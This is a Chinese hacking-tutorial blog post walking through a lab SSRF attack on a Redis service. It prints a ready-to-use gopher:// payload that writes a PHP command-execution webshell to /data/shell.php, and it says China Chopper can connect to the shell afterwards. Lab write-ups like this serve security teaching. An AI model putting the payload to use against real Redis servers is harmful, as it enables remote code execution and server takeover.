你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)

小编:圣子 更新时间:2022-08-21


小编这几天一直在做关于ssrf的实验,这篇文章可以带纯小白黑客入门。

靶机ip地址:192.168.2.138

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)


查看靶机运行的redis服务。

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)


攻击机为ip192.168.2.112.

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)


用客户端redis-cli连接攻击机。

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)


然后输入命令。

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)

最后用save来保存。

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)


然后进入靶机的docker的redis看看有没有test.php.

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)

查看一下test.php的内容。

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)


此时,就可以用菜刀连接了。


那我们换种方式来。

先用kali来查看一下靶机(192.168.2.138)的6379端口的信息


你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)


用攻击机(192.168.1.112)来使用gopher-redis-auth-master来加载负载。


你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)


你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/data%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

把这个复制到我的kali上,然后把127.0.0.1改成目标的ip


你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)


进入192.168.2.138靶机的的docker的/data上查看有无写入

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)

成功写入。

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)

查看dump.rdb的内容

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)


此时,写入了一句话木马,这时候就可以用菜刀连接了。


最后还可以使用kali的nmap -p 6379 –script redis –info 192.168.2.138探测ssrf漏洞。

你也可以跟我们一起成为黑客大牛(你也可以跟我们一起成为黑客大牛的英文)

最后喜欢我文章的朋友请加圈子关注我们,私信关键词:学习。(送免费资料和优惠券)

就会自动分享给你微信号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。

还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券